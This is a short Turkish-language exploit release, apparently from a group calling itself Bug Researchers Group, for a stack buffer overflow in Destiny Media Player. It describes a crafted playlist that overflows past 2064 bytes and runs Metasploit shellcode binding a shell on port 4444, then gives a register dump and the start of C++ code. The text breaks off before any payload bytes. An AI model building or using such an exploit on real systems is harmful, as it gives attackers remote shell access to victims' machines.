Exploit’i çalistirdiginiz’da playlist dosyasi olusturacaktir çalistirdiginiz dizinde.

Playlist dosyasini Destiny media player’da açtiginizda 2064 byte’a kadar bir playlist bellegi verilmis yazilim’a, 2064 byte’tan sonra yazilim overflowlaniyor.

Bunun üzerine bu Bellek tasmasini degerlendirmek için bir exploit kodladim.

Metasploit.com’dan aldigim 4444 port’unu açan bir shellcode’a bilgisayarimin ret adresini vererek, nop->shellcode->ret sirasiyla çalistiran bir exploit.

Kisacasi, exploiti çalistirip olusturulan dosyayi Destiny Media Player’da açtiginizda Bilgisayaranizda 4444 portunu açacaktir.

Not: Ret adresi her bilgisayarin ayni olucak diye bir kaide yok.

Remote/Local olarak kullanilabilir.


/****************************************************************************\
* Destiny Media Player 1.x.x (Playlist) Stack Buffer Overflow Exploit *
* *
* This exploit bind to port 4444. *
* Tested on WinXP SP2(TR). *
* *
* ------------------------------------------ *
* Registers : *
* *
* EAX 00000001 *
* ECX 00310FF8 *
* EDX 7C8FEB94 ntdll.KiFastSystemCallRet *
* EBX 7C80BDB6 kernel32.lstrlenA *
* ESP 00313C2C *
* EBP F73C5FF2 *
* ESI 0039047A *
* EDI 00B2DD5C Destiny.00B2DD5C *
* EIP 00313C2C *
* ------------------------------------------ *
* Bug Researches Group *
* *
* Discovered & Exploit coded by Bug Researchers Group *
\****************************************************************************/

#include <iostream>
#include <fstream>

int main() {